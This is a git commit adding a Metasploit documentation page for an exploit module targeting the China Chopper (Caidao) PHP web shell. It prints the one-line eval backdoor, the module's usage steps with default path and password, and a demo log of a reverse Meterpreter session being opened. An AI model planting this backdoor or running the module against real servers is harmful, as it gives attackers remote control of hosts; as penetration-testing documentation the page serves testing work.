Add KB for multi/http/caidao_php_backdoor_exec

2016-08-20 04:12:31 +08:00 · 2016-08-20 04:12:31 +08:00 · 51a2354fea
parent 87d34cfbba
commit 51a2354fea
1 changed files with 49 additions and 0 deletions
--- a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md
+++ b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md
@ -0,0 +1,49 @@
+China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
+
+## Vulnerable Application
+
+Here is the PHP code of the backdoor that you can use and save it as caidao.php:
+
+```
+<?php @eval($_POST["chopper"]);?>
+```
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
+  4. Do: `set rport <port>`
+  5. Do: `set rhost <ip>`
+  6. Do: `check`
+```
+[+] 192.168.1.103:80 - The target is vulnerable.
+```
+  8. Do: `exploit`
+  9. You should get a shell.
+
+## Options
+
+  **TARGETURI**
+
+  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
+  
+  **PASSWORD**
+  
+  PASSWORD by default is `chopper`, which is the password of the backdoor.
+
+## Demonstration
+
+```
+msf exploit(caidao_php_backdoor_exec) > exploit
+
+[*] Started reverse handler on 192.168.1.108:4444 
+[*] Sending stage (33068 bytes) to 192.168.1.103
+[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
+
+meterpreter > sysinfo 
+Computer    : kali
+OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
+Meterpreter : php/php
+
+```